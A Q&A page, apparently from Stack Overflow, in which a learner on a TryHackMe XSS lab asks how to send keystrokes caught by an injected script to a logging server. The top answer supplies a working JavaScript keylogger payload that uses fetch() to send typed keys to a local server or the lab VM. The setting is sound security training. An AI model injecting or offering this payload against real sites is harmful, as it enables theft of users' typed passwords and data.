0

I'm doing the xss challenge on tryhackme.com (https://tryhackme.com/room/xss). The 7th task asks me to use a simple keylogger

 <script type="text/javascript">
 let l = "";
 document.onkeypress = function (e) {
   l += e.key;
   console.log(l);
 }
</script>

and send the input to http://<vm ip>/log/<this data will be logged> as that will log the keystrokes which can be viewed by going to http://<vm ip>/logs. I have tried things such as window.location, but can't get it to work.

For further learning, I'd also like to send the data to my SimpleHTTPServer running on port 8000, so that the keys would be displayed in my terminal as they are typed on the webpage. I cannot get this to work.

Could someone please show me how to do this?

No, I am not being malicious. I am learning as I'd like to work in cyber security. If I was being malicious I'd just use scripts I'd find on GitHub or something without understanding how they work.

Thank you.

Improve this question

2 Answers 2

Reset to default
1

As SimpleHTTPServer logs every request it receives, you can use fetch() to make a GET request and pass the data within it.

<script type="text/javascript">
    let l = "";
    document.onkeypress = function (e) {
      l += e.key;
      console.log(l);

       fetch(`http://127.0.0.1:8000?logger=${l}`, { mode: 'no-cors'});
    }
</script>

This would give you something like this: enter image description here

For sending the data to the VM you could use fetch too, being it something like this:

fetch(`http://VM_IP/log/${l}`, { mode: 'no-cors'});
Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

1

Excluding many packaging resources, you can use a simple WEB API to achieve this purpose. Here I briefly introduce two WEB APIs

Fetch API

The Fetch API provides a JavaScript interface for accessing and manipulating parts of the HTTP pipeline, such as requests and responses.

fetch('http://example.com/movies.json')
  .then(function(response) {
    return response.json();
  })
  .then(function(myJson) {
    console.log(myJson);
  });

XMLHttpRequest API

XMLHttpRequest (XHR) objects are used to interact with servers. You can retrieve data from a URL without having to do a full page refresh. This enables a Web page to update just part of a page without disrupting what the user is doing.

function reqListener () {
  console.log(this.responseText);
}
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "http://www.example.org/example.txt");
oReq.send();
Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.